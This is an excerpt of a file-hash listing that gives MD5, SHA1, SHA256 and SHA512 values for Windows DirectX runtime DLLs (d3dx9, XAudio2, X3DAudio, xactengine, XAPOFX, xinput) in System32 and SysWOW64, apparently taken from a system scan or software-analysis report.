SHA1 d2a710b332de3ef7a576e0aed27b0ae66892b7e9
SHA256 8d540d484ea41e374fd0107d55d253f87ded4ce780d515d8fd59bbe8c98970a7
SHA512 a8683050d7758c248052c11ac6a46c9a0b3b3773902cca478c1961b6d9d2d57c75a8c925ba5af4499989c0f44b34eaf57abafafa26506c31e5e4769fb3439746

C:\Windows\System32\xactengine2_2.dll

MD5 dc5a914c34eb12056531777d4dd0f44e
SHA1 cd77b5c8485fbcdb8bd3db5ab1c66006d3904686
SHA256 7b4e5938f1f69e5b8aaa8ecb479245b5773786192a47f9fdf6bd8eccfb109b83
SHA512 07c56e7754f179f72d5193a826221a02c6502803437cebaa8ca0dfa9f3c3488a28b4b45b551943c7094a6de402979c37f477b8bd5e19cbe63cba7197086b5ed3

C:\Windows\SysWOW64\D3DCompiler_33.dll

MD5 fae7e1d578c42a7c3d9d61a99d178bd5
SHA1 8ac88ff2bc5f616ed284a04ddcbaeb72fb1f304a
SHA256 12e238af4b4edc1f774213709a87a91b77b2c9d2d18fe475b027872923b6fa17
SHA512 75107c64acfb6d84e1b05ba78377dc4699ba83b694b7ace474665c85f3e5843db6d06348fefed539c6c2b233775c7ef81d7bfd81937207e04e637043633cd0b9

C:\Windows\SysWOW64\d3dcsx_42.dll

MD5 b337306dfb508a1bcef1974bfbb8d924
SHA1 203c32d73f99e1097bc306c9225307a18c617f4d
SHA256 e462eb3d41db54988ce3be46ced60b0073f8d939a9946cda67fb1df3c8afe0a1
SHA512 5c7a101e403aa2eab57e2972427a67ae6cd1598a35f983af784ca3a7446f7c60ad3cff7e52510f14647645a49c387020a06242663433db89e6454188b93813e0

C:\Windows\SysWOW64\d3dx9_29.dll

MD5 99f4fc172a5ace36cf00aa7038d23f2c
SHA1 893e05e369c2388daec359ec550fee5b9122ed40
SHA256 c5e21c18f8c79bc517da59e3192c39ea73bdcaf85867628187f6b3cca07dd21f
SHA512 a4b86d84f99c3d0c0825e3581878aaa25207765bcfbf31cb07cd6bf69a9cbbe1c3068719b212e38f741e06a89b9bc6d217077a0dec7f9efb1be75fc3c214dd52

C:\Windows\SysWOW64\xactengine3_4.dll

MD5 686f8d1b4926d48227a06acd4d41cd1e
SHA1 324fd1d21a42f0c30bb071beb2cd5db9abbf3138
SHA256 d3bad7995b998f2c95dbb33020a198ef5a248825321032f051619f353d46182b
SHA512 6ed69ab933492870b7fbf4e178999b835846075fe103e65f9a0f9b1ad8d47c9277f31a7a0fb53f3620b591b103b02bfa8efec530d7372680f585b82e128edcc4

C:\Windows\SysWOW64\xactengine3_5.dll

MD5 db3c93e87452b8dab4f58ed1fd2b1998
SHA1 fbcc3c80c74e98e8554260b8a08e14dd1670075a
SHA256 1d37ab9b90372eaaafb5055401449dc3184428fed559baaf36fbcccd2479611a
SHA512 af693d7d326dd7874e0eba5b4163c21aad86270f8e54058c637f1cd200e45eafb75f79a2d579c477c06082ace44f3318bcef71698089808690ff88443ddf348b

C:\Windows\SysWOW64\xactengine3_6.dll

MD5 f81c4678a55ffee585ac75825faf5582
SHA1 8fb2e6cf2a022eaed2ff5e3e225b3ca1e453d1cc
SHA256 8a7e7c5ac2e6230f0249d46751522e7ecf85e7490cf7491ab73bf2e7e59e4c0f
SHA512 8c8071bc2640d5c0fcf140ad68d4788cbb0706d17313c3cb74e25624a748b282acbf77eda678cf0d5fecf2ec3d583508c6f4eaf5c84073909b616f59b4f4e5fe

C:\Windows\SysWOW64\xactengine3_7.dll

MD5 4fd7bcb9d8af6a165e9ba0c2eb702e7c
SHA1 a90863632c2d54dd06e01537744a7b65bb3d0db2
SHA256 d7b1cf58898046c430d49cf8f778e4898280f4709340c3938d3139894166fe8d
SHA512 7fcc435d07c434ec392bb9bfa98aee20b0b1cd2ad6a31f073af80f6f37639336349728c9b0fcd967c4c395fc40c0efad1e36142fe7632512b0f26aca1b1c4bea

C:\Windows\SysWOW64\XAPOFX1_3.dll

MD5 30686ece80545e06d78d156eb9f7d463
SHA1 b257ba4ffad8003fb7d12e9babd3cf4e88bd52f9
SHA256 b05ad9417028b9777f69422caa01ae9fd22c7bfe542bc6e7de2649e28a4ea643
SHA512 ca03bb01d8e2608517462597076bfa96f4b2595c33b2635d80e4348ac3926e17c93e5db30d7e43c30277cf8ac07f982a0c729f83a00df8965993d4f0758eca13

C:\Windows\System32\xactengine2_3.dll

MD5 0396d2a98b0ccd4419b572ebf618e81e
SHA1 48583c8a4573709502266fb3d42c43de66595807
SHA256 1cf72300e03b4b6fc48e1d9e79d93c42d657ee1f87153035d1578d1af8616ad5
SHA512 6e3168ef8035f6ab56012c64c6cd40adfd4caba391162f856c436555624ffa845321ec95147af35ba9bc969779b44f052818583352b5192de4529e18ca51ee4c

C:\Windows\System32\xactengine2_4.dll

MD5 58bb51253427a834a8807b9245cc5965
SHA1 7af8cd08c318b81721242fa2ed472ce86be13caf
SHA256 2bfa6e7b793299a306a554b60a39d001e493937e88dca403d9f0dd1ea0de1aa0
SHA512 8adcde6a765e65c8684e339e65e0d3eda1df3f26665e62798c6fe9579ad65a235cecd95661cf39fe7a0b82912224ca1d6d6c66d5728e3ac2ffdd56b20313dadb

C:\Windows\System32\xactengine2_5.dll

MD5 398ff46ff7354fed2f0f1aecdb546866
SHA1 e9ab65083f70a8ff3bc5fcc9e2452f4411e33b57
SHA256 a737ea87fd5b44343c26da6d47508901b916b83c5f4a508c0b18c56faf8c0329
SHA512 d3efa67ea02aec3ec91123b002615c2cf2c9f839bbd3d996d4b6296f6c535bfe5e67f46bf92d81fd0ee9c9de878764e3cc248ff7474e6405c1661b4713da2d61

C:\Windows\System32\xactengine2_6.dll

MD5 4837a54574a6105d404a8560984b93dd
SHA1 066bd03f63d110c767496fed1740c5dcc9d8fe40
SHA256 9f4c316be32e4de8c6594c26ff50410d2763b5f3320741b912a81a9ea9b7728e
SHA512 358055685c53c2c533221f3ef84c34a2d47afeb94f7fab44b9f57251ca006fcf303195ae7518e1ae01d8b08c29313741e1c45639c3e2a7bd8f4fb65b918013b9

C:\Windows\System32\xactengine2_7.dll

MD5 8c970509e0ae10061e3ed6d51e34feb9
SHA1 29e2b6c6457b04c736b874b91a492d1db3a26124
SHA256 bcf3012a44b448402166bbab661a9fbca7f9e3c11ad17b3f96a54bbbb82bb235
SHA512 765ab00113d1d16775be9edeecb69b9a050b7e43eac8b7738e82f2d47d8346f5ffbb9f38c9bb308eef79c1167717fd8a297b5285cf696bbdec4dcb089c596b76

C:\Windows\System32\D3DX9_42.dll

MD5 1af7ae1fde027a30b9097280819a0a86
SHA1 79e158e4b9b04bc5b69537343f244fc2d12db1af
SHA256 1d6f5aa25ac2f1e55d3fd89cd5b33edd4de3709bf0353c75ab8645cebc087fa5
SHA512 92cf7ae0dfe1437227f8be37f50d84a6b18876485cb953c6a972a2f0c9f10d940941f34e8c8188559523b69bf2f6ad463526f87de52f8f142337031e753f6f0d

C:\Windows\System32\D3DX9_43.dll

MD5 7160fc226391c0b50c85571fa1a546e5
SHA1 2bf450850a522a09e8d1ce0f1e443d86d934f4ad
SHA256 84b900dbd7fa978d6e0caee26fc54f2f61d92c9c75d10b35f00e3e82cd1d67b4
SHA512 dfab0eaab8c40fb80369e150cd36ff2224f3a6baf713044f47182961cd501fe4222007f9a93753ac757f64513c707c68a5cf4ae914e23fecaa4656a68df8349b

C:\Windows\System32\x3daudio1_0.dll

MD5 f77d5ab654881e683cff6650916c424e
SHA1 56d8f090755f1ec60b13e748b040069ea8759b5b
SHA256 77cc09cea6de69f12106e6dd9df1c0446a525a54c3953d69d64711b9394cc38f
SHA512 dcd1273673f4088e854057e47484bb363e1e7ce094bc2c98ad7cc9112877892c1d6fd591dd9cfb325d6c451f2d03a4cdcc238af1ffb5382b7153f079cbe13abd

C:\Windows\System32\x3daudio1_1.dll

MD5 489e5b8bb1bd1028ff1c798eaaec65e4
SHA1 da9c385c48a6f590347581c5c3dea67502b99837
SHA256 fac23787e7c199c1969806850b5a9652f66f6dcac86f48f6f834abc253848a55
SHA512 33e3c28d60c7063d76c6959ef18dbb0227466766c4be9ce920911e192b75c18d11943a2eb0bef2caa920a6efa29162acf9f6c9c07ed5ddf5858420b240e0c0cc

C:\Windows\System32\X3DAudio1_2.dll

MD5 bc78d5328541410510dde06b9fa92024
SHA1 f6123294896cc3c3d3cf5a9e0e03319f58da7cf3
SHA256 7a34a7a8af47c6b2cf890ecb56bad2454ba5eb1ef2df6fad9ee53c4770e941cc
SHA512 5284d695216aa4f70abafdea130326d8ee3c6d9a9858dfa3f5b184c6b8b185adebcbc92adb8a7530f9127ae1de30561986bf9c85bfb8b474a9812151a7843c59

C:\Windows\System32\X3DAudio1_3.dll

MD5 c4c2ed69b18ee1c60026877fcc470fa7
SHA1 59dc0272c4e376a2598dbd9a82dc07be32fbad78
SHA256 96c2a80a7fa7670d323e584b956cc98f69f2a22e5329ce4a93269468b142de44
SHA512 f85612fae3734054722a030852ea46d303ffbe3920485344ae8e48cef02ac1a0a20e608a1b44645c93bd6d1091748e16cbde605640e982132415144013763f3c

C:\Windows\System32\X3DAudio1_4.dll

MD5 de6004d16dbacd781ed4596c4fea7d14
SHA1 1e1c8b6b5b1b2094140ea8bad543639c8a0f29b4
SHA256 e38b62c0946b9e4e1446e0f8c6335fc7328eb20cc587e310983f3f6d6571ac5d
SHA512 dd5fc2e7bb8fa922afed47a820cff84d896c24410ff1038548036840d7fcf649d15765aa137c3f2cd9b6a87189c62660c15da56bf03971e70e62bb81b5556df4

C:\Windows\System32\X3DAudio1_5.dll

MD5 cff1c1f7b9f855ddee431d7b5dcacdf8
SHA1 7199379d9e86d512f7536a6d74d133539492c8c1
SHA256 8dd91637f40136f8f941d0b9e8a096964336759a91beb3265a78627e800da85f
SHA512 e5309418b9d4f9cc715431cd744465f75213836caa417ba39d82388f7f452e3c9626341858f019d030d3390e555d6130a325408a6ffea138bd4fe5cd4280223a

C:\Windows\System32\X3DAudio1_6.dll

MD5 eee871cc4f5563ff8b3c8385b32b0c5f
SHA1 940fd8c5a0cda898e55c80b36b139d766ed7e126
SHA256 0afcf64138aacab2b4a5e110392a7d978694dc545845f89782c07c650f212f3b
SHA512 e2bd013d7b8232bd6bab21832374d48f4316a02299c96e526c416b832d13bf2824f81db9f9a96c76d4d7ff1cc989053392f413132592757c51725ffa7cf722d4

C:\Windows\System32\X3DAudio1_7.dll

MD5 b4ff2a39685c1a6d43f0e56eb350af3a
SHA1 466f80be26352f8331900a6da5b0a18dc7b39c0e
SHA256 9460709339701ad471a5cabe6365355f4d586dc4fcb86507c1331839dc555446
SHA512 cef31793e1b1714826aa95d256ebbec457e8cf9003767db46909bf879af86f954f475ac84e1ee8cccf1dcfe4a52624e3d7e8bfaff5f567e97cab19207db7f913

C:\Windows\System32\xactengine2_0.dll

MD5 ce5753f9a27837259eb52f3f47f39593
SHA1 2eb60f397eff937249521fe0bf5fe89eccee4914
SHA256 a00ad310f3d7b2d4de2f5a4c081359fa443ce0baecc72ebf39d6b30ccf7babce
SHA512 93fa47262f1b1ed9b284337f7225bdc06b6931931f385eeb30faaba25f1ccc483d633a40831471da70077d6a1f6a84c21a909daea059ecf316534b1994467230

C:\Windows\System32\xactengine2_1.dll

MD5 0cc809422ab40974dff8078392e4d507
SHA1 c20b6ff4216095890432a74c4b59405921657c64
SHA256 3ca31f274ea55cb966ec0b49addf72e1e21269406ae5fc44de3d5bbc884a6ce4
SHA512 07dbe11583c7c83fe5d0a1fd73d59f2d706198323058664d167e280127adcb29b20597abee17800b140de3c41eb3b684abd516290e62c65f72eee313dfb76be8

C:\Windows\System32\xactengine2_10.dll

MD5 e8932af24786765859558cb79e385ac2
SHA1 68cde2e238460be604a49b5f700620830425174b
SHA256 3fcc50623a5da6b23788dbde6eb10418b414865b12c84247ddb3024fda59a8ab
SHA512 136dd820898ad64963a419f4d7baa118e63f8c28cc7aa538cf9d6bc60d30372d585f75ceaf03055d965451a7dc2dec965950a68983e30f1373e303f5899344dc

C:\Windows\SysWOW64\xinput1_2.dll

MD5 33b62be226934e1b01f5043870c70427
SHA1 ad96f837accd277da2933d07aa86ffe3ef803b5c
SHA256 9714d146a785d458f0de8fef387d82c9f8e101c02407a0cbeb06f02a69518eec
SHA512 41f859fa59145ef6cdd6cfc4a14f90bb932d2c6aa339bda1763d8e315e6a78bde561010152460e6f996c9ac9ffe6650ccdf6ded34656081a0ed9ab1270773710

C:\Windows\SysWOW64\xinput1_1.dll

MD5 f1726346e583442541fe73429f8e9c10
SHA1 a1b7a4edd7d1164197f734218fb485165c075d0a
SHA256 69cd725c53e0302e75db20e9a3e4b33f58dceaa2e6ea4938b2733df8bc289a71
SHA512 ba17740271ea92c917db85c64d4ef63a8f2036fb1398abdcbedf9d49c09a53e34ea04e8b3f5a2ee41c2b2ecea6196ed7f9866ee48a9f3528c3b4c1f19dc167d8

C:\Windows\SysWOW64\XAudio2_7.dll

MD5 81dfddfb401d663ba7e6ad1c80364216
SHA1 c32d682767df128cd8e819cb5571ed89ab734961
SHA256 d1690b602cb317f7f1e1e13e3fc5819ad8b5b38a92d812078afb1b408ccc4b69
SHA512 7267db764f23ad67e9f171cf07ff919c70681f3bf365331ae29d979164392c6bc6723441b04b98ab99c7724274b270557e75b814fb12c421188fb164b8ca837c

C:\Windows\SysWOW64\XAudio2_6.dll

MD5 4976243bd70fae3d1d24e49739ab2710
SHA1 6ef27b10bcf4e697fe77c3e964b326be11e4444f
SHA256 61b57170f7c6365714396072d22cb98746718c0f44c9f0d5c62fdb1b218639c7
SHA512 af2d6aaad44bed880a1a2ee947618b142c76a5eca42d4608196b74df9108a9649059d8207e84a58b76ad43aefe9b66ffcc519f8126667177011cf4199f163e83

C:\Windows\SysWOW64\XAudio2_5.dll

MD5 8b01fb723f3b30ab3debddbf97cfe577
SHA1 e379c3b7d0a66da06b6a381deea19bc541ee0689
SHA256 c596de2ab8394fb62538fef0b4657317f4ead50a6d798c5d066e25e334576c27
SHA512 ba8c5bf7eb657bce6e2c937e082b97bd6169d1cf3daa5800e5112d62596bdea47e5c1f23146f3f696cd68e8def4df92e3fb24a9aa8b9a08320738b66fa6dfe2e

C:\Windows\SysWOW64\XAudio2_4.dll

MD5 e684c5fa18adf9ea14737757413bf727
SHA1 1dd454144e8c0f3aaf24db0b77f03737914d9a72
SHA256 bcde4317debd0052b1436a6fda60e1dcb1e308979498117fa0cb50061f38101c
SHA512 9686f92745a30fd9e442ff6a24dd89410aa483ccd46edbefce0fe378645292255a323e1aae146180e8a4ecd15765a996df959a302d5cdbc6dfa4c5fcb8252e4d

C:\Windows\SysWOW64\XAudio2_3.dll

MD5 47ed15dc87ae334c13c4dacd1be2cced
SHA1 54f94839c4e4d798a1f4f1fb6ee240957a738cb0
SHA256 04dec9d7c68962e01efec0aac0ef7a3499bc4c16e8a41bd61fe6641da48d7dcc
SHA512 da0707a153172c48036d885404035829ea251b7df5a9246fc05dd164ceae9604cb0cc931b85d77151bc613cd5e7e4d0430a4fd92697c8bbc8faf5fcfd1c140c4

C:\Windows\SysWOW64\XAudio2_2.dll

MD5 50f4a0d5e6a0bafefa78f353533b8e06
SHA1 d370434eea3a557ed77b2363dfac720a5ed98666
SHA256 9c7897b4ee1bcd190b1c0b7b77e64ee731d234764683a1e2286af70d86b62753
SHA512 7686b893996b76a25ca7da971ca3a10400dcc682a05e8317a9d159a9317537de0bc20dfdef643e85e6ee548d7893138497fc156f77534124a8eb3e3ce47f0cb0

C:\Windows\SysWOW64\XAudio2_1.dll

MD5 e34ff0115b1ee3b4e03d22ae9840ee03
SHA1 746e6e84ff7f630643ff9381b9dff1f40a49ca16
SHA256 32a7c6a4edef46f025a4a5c64b892e29baaae948e86d9ed49e82014eec1441de
SHA512 7448bb3ebb8815e13e14514c8580dfb7f6de1a96c90f6611f6766dfb48ae7bc4a06efdc493060c054f222e7d9b308e062e1cabb19a60f50ff9e20f06905df58d

C:\Windows\SysWOW64\XAPOFX1_2.dll

MD5 295e47a75f278580f9441041eaaea3d2
SHA1 0716ca729ca3d84e9dfb4bd97c1e12466cc68625
SHA256 d1a55061bcb42f69b7cf35e2985d48e30c7a90f0bc668e90390f465b36bd0161
SHA512 a3cee1d45759fe3323fe8c3c49600856a86b61b3174c4d9c71e58a95db4848683c71605f5bd8c04bec591da02d96b79c68c1135410930ca63d17f7a929f2dc4c

C:\Windows\SysWOW64\XAPOFX1_1.dll

MD5 d95eaabf5d277ef91d9ca70151209e56
SHA1 3d47ebbd6236045309d2222a696b7141c0957379
SHA256 5ab63c0f040fdf65e681eba4daa55ed83e89ea10c426dc2fc763da0fc94f3ace
SHA512 6d2e73468485fee2b4007f1fdf16381cdd6c77edbe5530f63cbf8696646b14d06100fdf54a48547f29ea5775f29226b16808a5a1bd4c0778413855f80e5b8259

C:\Windows\SysWOW64\XAPOFX1_0.dll

MD5 dd165760f1b95200a3da2d9dfdb84234
SHA1 0724300a1cbaa32e03a234cf6080a67967c335d3
SHA256 8b396d275de2550af8ada6a1ff71f0f4870b51c8407e44044c2dde7ad6b754cc
SHA512 eb130afda1481dd0e27a19330a8be8045b3172e46edcc5a0cb089e191fe415c41cfbdf3af8f084a6ff58f89cf8d7d4d0879a3bae8f93a52ffc84da2d4fec5ccc

C:\Windows\SysWOW64\xactengine3_3.dll

MD5 8ba296419af3417d1e9806b83166e472
SHA1 a2a8a64aedcbda68149a2726b094f1710cba71d1
SHA256 ef052bc9b7fde596fff3ea2d9c8fc994f3282953dead1b7f5477e7154af67245
SHA512 877e89553cbfb6afc6dfb22a590a468f035dccffecf842cb26010d5e62e33fe10e477d5cb157d321de3ecc59112ba616b80e767028eedeb4e70a591f1b81b902

C:\Windows\SysWOW64\xactengine3_2.dll

MD5 f3c6be26949caadb11dbf0086082fac9
SHA1 6b7a2475aacaf63f30964e9958713bec331c82ba
SHA256 e6a34c1f068f89d6515cb460eed3b4dbb53522c5579e6c75741482f0d40d9f99
SHA512 167afd32d847088d4973437f8b89badce194211f8fb1a14cf30df11848e4d4dd8d5243765edb1ed09df0f9b674cd7de764f1dae9fcac91f0ec98ecd259181d3b

C:\Windows\SysWOW64\xactengine2_6.dll

MD5 39000e033d39d19ccce21aeafcce2476
SHA1 6e7823e689a9b720a049a260380805a235ddbf75
SHA256 be45aef0889b03e2243282a912f41580e8566db666a782c26a1d4d7988799d03
SHA512 65047afe28308ce69e3b410b3b52b5fa4f615c95802019cb9b78ac69694e9987076af4bddb2ed7e47b0fbe73729c91b94c525e5b7644a42658663ed044b384e6

C:\Windows\SysWOW64\xactengine2_5.dll

MD5 86c93789e9006f1ac47ed9dd47d4c8a1
SHA1 e9de46eb68271018aa31c71ef89d1ddef19edf7b
SHA256 ec68b5163cbb5f15e2fbe37fdf5fcb0d01dffbe53a460cb2cf668f31f0127ad5
SHA512 5a86661171f039946fa0568c6a9c655026c0a74c04a7789fadcb4acfd6a4faa5179d14149321920ceca9a1214910abec3e67e356898d5bdd044ffeefaeb57df3

C:\Windows\SysWOW64\xactengine2_4.dll

MD5 6550e1a0a7be611592c31222fcb981fb
SHA1 2197a951ecac85f7144fb925f6daff9ae7811e5e
SHA256 1e0e09fc077bdeee3de065c663b83f6717d39d56778833f030955077d490d000
SHA512 4013fba5e4211e66ebd9f733ff35635cca82875d6af71dcfeb481a436efeab608fe41310bae63d55c7fdd64a5c5f64068ec1eeb997160c8ae27f21f28e2bade9

C:\Windows\SysWOW64\xactengine2_3.dll

MD5 69d841744b2bae38fbb2d40a230a549c
SHA1 2a6429b1b1758bffe3366ab72212fb9b02152d77
SHA256 ca20cf8e4034719a46bf67c6009486c2c1cfc2da10ffed3a67dcae677b4f6793
SHA512 d5e26da74fc84da90b0f60451479524f1d03946076d009328aa7f9939456762633006d11970dc4c849101728ca32350c125005eb4e3f75114d4528cb17a35b44

C:\Windows\SysWOW64\xactengine2_2.dll

MD5 5c4d3843b491c047b7a619901fbd2ec1
SHA1 e02dd40f54e7dde0bcbd648e4fc6f723ac438bee
SHA256 4f996edb65022e33ae9c9f7acf7232c8d444f75c50c72894f6d3173b55404ebe
SHA512 474105b213bc067e0822ee22c769f0caa7a02f2d74a0422b676675fc45482db3a8a3dcb2744339a4c7fa029a2f58a2aef5db500c65cf646106d8ed096b17d062

C:\Windows\SysWOW64\xactengine2_10.dll

MD5 73e055af78a64f9b2779d44407ca2ab6
SHA1 d771ef11d22a79dba7deccb9b3efedcbe74532d9
SHA256 113640ae8cf78caa7cface2f906f9e6b60809906f5c26e08b2e90fc48430f3b7
SHA512 a8d979297ecce24a29459e7ff814e53c649a6c969869279dbf0f29edea4d73883441519a27e5e46bb1e4b5b942cb26907cea9a488de0067e589632687b25b5be

C:\Windows\SysWOW64\xactengine2_1.dll

MD5 7c9952111f4c743b9f0d8b68b6ed93c9
SHA1 75dc863ed10e4e4a18fa06dc32789cf16c738c38
SHA256 666cef7d27a38f709063c9c581fd95e6b3fa27167bff4beff484dba2dc922a2b
SHA512 aaa3396fa9081f25b2eff6682ea26afbd297c8a61cee4540f9a947c1a96ad51f114a9985bbc69ea7d0251f6e4b1e835c92daf0f8c5fd66e477e3243ced3c9bef

C:\Windows\SysWOW64\xactengine2_0.dll

MD5 2112fe0c46662d429347a7d7b49e3ece
SHA1 8cf607547e9c5a10f129a3a8f8f32bd295c0d5b4
SHA256 cfd1c2d34feb7d94f282e97bf762a99bfa7309dc7353d96dfe4aadc187d26c67
SHA512 77f77add8411d418798d643d783752896d3fcac002f15696caeaf45b5396d2d42fe53bfb409d66ad505cdaac0ef0a20a62aa45b50aebe65237d2c44af36bbc34

C:\Windows\SysWOW64\X3DAudio1_7.dll

MD5 c811e70c8804cfff719038250a43b464
SHA1 ec48da45888ccea388da1425d5322f5ee9285282
SHA256 288c701bdedf1d45c63dd0b7d424a752f8819f90feb5088c582f76bc98970ba3
SHA512 09f2f4d412485ef69aceacc90637c90fad25874f534433811c5ed88225285559db1d981a3ab7bc3a20336e96fb43b4801b4b48a3668c64c21436ee3ea3c32f45

C:\Windows\SysWOW64\X3DAudio1_6.dll

MD5 e763798cad2a90b6ab61854f50cd47dd
SHA1 419f2c98d2a3f419db1b1e9b5f4f7c3b9b636c1d
SHA256 574d14ab9a641c6cbadd78f2cd6c088b64b59c3646057952e63cad7d2778e1c3
SHA512 b455b0078786b7ff8362f7404095037a5332603383707a6dd493f381eae3e28135696fb4863e1915ea01c0f12ce10d021a18ab91cbab06b4d20142e0b38833fd

C:\Windows\SysWOW64\X3DAudio1_5.dll

MD5 350fefe18b86bd4d9ab2a96d00215a49
SHA1 be4ddfa0edc3a463471fc170e9706abac0a672fc
SHA256 315944bb2a1959c8a4bd2677ed415363e1611c7351ce55319dc98fd2aac83f87
SHA512 490bdd66920e36aaba2a4d12bfe4aacbead7403b1a623bead0d9ab5f68d80f46fa530c5f7de9e747eb8acbfbec8c635aea32655dddcb6a9d8e006339e1e8857f

C:\Windows\SysWOW64\X3DAudio1_4.dll

MD5 e3832514bd21236067b7227f6165ef95
SHA1 bdde126bfa7e3133f33e3d3e7b4618422c61acac
SHA256 799b38139523a3b30d26e21798ee705375c61eed8ae2434fddb52fde51f4bb78
SHA512 e60bb2b8cea5864f3311dbc0ad8f7813764bd55153bc0554e2842b6973fe24a1ce9e4381fc6fb05792d97799fb247d591e15b7dc41eec2bf563bd4f7ca797d85

C:\Windows\SysWOW64\X3DAudio1_3.dll

MD5 c593fd0a96ee4b6390b653c4c641313f
SHA1 60d71ca2eed9ff8afa5561cf1dccca03607134b0
SHA256 74ec3e6b253af1b68252e62a5c08479453b3341d49c606adcf36913fe9ed9717
SHA512 1bb328d1a68dd7b7657d033bc2bcb8e2c096bc591e435b5691a4ad4f0f49cfad70d4e48af48d10eaf4ad13d479a3f4fef66b09a0852f8c61ff33937c7ea22190

C:\Windows\SysWOW64\X3DAudio1_2.dll

MD5 f6a9fc2ad2f9111372b5ab3bba3707ec
SHA1 bc7afb780d42a332497139b5236b809433d86009
SHA256 4c448c7f77e3b4385d2cd35d0c470589cdf0524e532f9cf7ae084a8f88aa949a
SHA512 6cb44bb174ef28cee3e3a6ac51897b5cceb3f2d06d08c556cf6476a285de3e3b03a624ca92fc11b95f29694629457fa39747e3041736f9b76e84f19a052ecba6

C:\Windows\SysWOW64\x3daudio1_1.dll

MD5 121b131eaa369d8f58dacc5c39a77d80
SHA1 d8fe20cb6f28bc5334ae64a8df3563d1985beb9b
SHA256 ff15f14174a5543f028fa49cca745582fe4cacf3bbe490749cf43444690ab359
SHA512 ffe19ffea137603e5401f133d461b30af6fc25b3affb8a8ce20b98e3270de398b9ecc83a6cd904ff42c5885d3806c7e175957bf4a5827dc2f067756a51bc40db

C:\Windows\SysWOW64\x3daudio1_0.dll

MD5 4e961525cc7ff0e5d7da19e170b7c14c
SHA1 7e3654ef7f7c9524ff415582f1b066f29b4234c4
SHA256 228dfece2b4555a243a73e7bf461036f1e53951977625651ff5a59deaeaf4b88
SHA512 8785d0b2188f36d53c1a2b99a669d6edff1c0c27905d5bda1615a503f115d5b0762f008481145cb0cb6a2589926543b9c8ed0ecc2e328593682e39b90fca2087

C:\Windows\SysWOW64\D3DX9_43.dll

MD5 86e39e9161c3d930d93822f1563c280d
SHA1 f5944df4142983714a6d9955e6e393d9876c1e11
SHA256 0b28546be22c71834501f7d7185ede5d79742457331c7ee09efc14490dd64f5f
SHA512 0a3e311c4fd5c2194a8807469e47156af35502e10aeb8a3f64a01ff802cd8669c7e668cc87b593b182fd830a126d002b5d5d7b6c77991158bffdb0b5b997f6b3

C:\Windows\SysWOW64\D3DX9_42.dll

MD5 c6a44fc3cf2f5801561804272217b14d
SHA1 a173e7007e0f522d47eb97068df0ca43563b22bc
SHA256 f8b9cfab7fffbc8f98e41aa439d72921dc180634a1febca2a9d41a0df35d3472
SHA512 2371844bc86cdce2d1933625b921b982c4d1b84a39698b51180b09a2d45732407d721fa01d294ca92a88777607a1bb00283f6bcdd4231137a388216d0b09dd5a

C:\Windows\SysWOW64\D3DX9_41.dll

MD5 3fa06cf5079b84155d18b05c08f7131b
SHA1 fafe52876151a08f39dbb6b4aa137dd85558ba5f
SHA256 6ac4df203af419d3f3b7d9a99e14a3490ea3ad307c474bfe36baea642b1421f6
SHA512 24d29c3ffb6532da860fef4dd93e61f7532cea3af94928495a3af0231e7dff6db5cad25713451a2e722c076462b94818cd6969a1c7d8905585b0f64e12174d1e

C:\Windows\SysWOW64\D3DX9_40.dll

MD5 eea5e428ce63804f9b12d21c97b5968f
SHA1 77a7f48f4bdb7e66ed5e524bb8879e3da0d6cd1d
SHA256 16fd909aeb68d0d1aca8529dc7f78880b97d6649d70ce8d03a2c858bc28e216b
SHA512 545518dabd82441ddfc17fe1c1cbd7d14603bb58130de1307a31f73b93ca42afdf25dfcf481f0383c4e039edfe4a88ae7b84b06a2850c29bbc3550114e499c73

C:\Windows\SysWOW64\D3DX9_38.dll

MD5 8f3eb548ac4ed90252394f60c77e3196
SHA1 e40bb2e3c99c55f2df9def2765bb014e01389622
SHA256 743e77a228e7d75442263ad70051e44534f7972c6326fd34b505a9c2c245894b
SHA512 bad441c93d37269a9d49edc39ded933e43baf2a563c425ea2db222a9859ecd1f076c2255c077a5afd07922b50adfda2bbb731ff6f292623b353a3dfbde4ce4e5

C:\Windows\SysWOW64\D3DX9_39.dll

MD5 8cb3defb8887c4f0846db1fc1304d6d2
SHA1 5fbe058848db16117ce7cfdabea1f178ba229a6b
SHA256 5d29988cad858f754ecc62c3d30de555f82cc21b5b26c448b890295e9b7bee82
SHA512 4cb675b179d05ead18d2e42329e0d10cd1d520cf9c8c0681b89aca79ac9c814e82941b0086135bd57721b66b55b6feae00bd29af804f59a486e935fda413fc43

C:\Windows\SysWOW64\D3DX9_37.dll

MD5 ac3c517fb0fbbe45fe44007bcd3625a7
SHA1 eabe1601d0132882c7226a4ed04fbbdd5e8f0db0
SHA256 c2ccb84c672a9d8966e82a28005a4269886ee304972ac3590c0b8a9c1622a3d8
SHA512 89b44142355c494f2a21276d0629f3536adc0dd7cec101a1f2816031afcc8a96f94663ad46744c772d6b63d172ea62e9b957d6292e4a6184f958576f62b05836

C:\Windows\SysWOW64\d3dx9_36.dll

MD5 44bfec5c9c82a2ee9871d88fd3b9a0e2
SHA1 e2aeb78330d0815cffedfe88438a71024577d4b6
SHA256 c12f0ab0338eb5031d3d04beaf7208ac848f7e037d21ff963d2af90221cbe935
SHA512 35c42ce3afeeb3710d3d96d2cf9ffa2828fe17f8d749fd149e3797e87e154508c77f637de0e424d38bb3fa56bca959cf9da7787323950ec8261b144c09ae306d

C:\Windows\SysWOW64\XAPOFX1_4.dll

MD5 e4ce2af32f501a7f7dddd908704a0ee6
SHA1 9dc2976efb15b6fba08bebdeb98929b6961063a5
SHA256 0aee44b12913a95840ee6431d90518b0d72c54a27392e21ee6995e2151554a06
SHA512 ec14a58414d595a36c6b575cdae690f11481cd3f0b35fd2f4c6a6d162a6272882cfe03da865e09a34972775790529f51c80b69056a2fcb909f25b549ed2f7f01

C:\Windows\SysWOW64\XAudio2_0.dll

MD5 418cdc57e55ee79c3f86c13a19b3d5e3
SHA1 cac2b8396b1c82a6f7ee2a3e3ec3d2e4c2f869fe
SHA256 e435b73193bdf651f7ae564eba05266595ac672db45e0e22dce92d0bcb3c6513
SHA512 1ba5a49d9102911d13d86ac4f0e4ecb44069c93a58e2e3225d9464755c14f8d57f230eb32049c2747385f7cbaa9c0da0f6001f27b685eebfcd94f3f5b8fa3250

C:\Windows\SysWOW64\XAPOFX1_5.dll

MD5 8a4cebf34370d689e198e6673c1f2c40
SHA1 b7e3d60f62d8655a68e2faf26c0c04394c214f20
SHA256 becfdcd6b16523573cb52df87aa7d993f1b345ba903d0618c3b36535c3800197
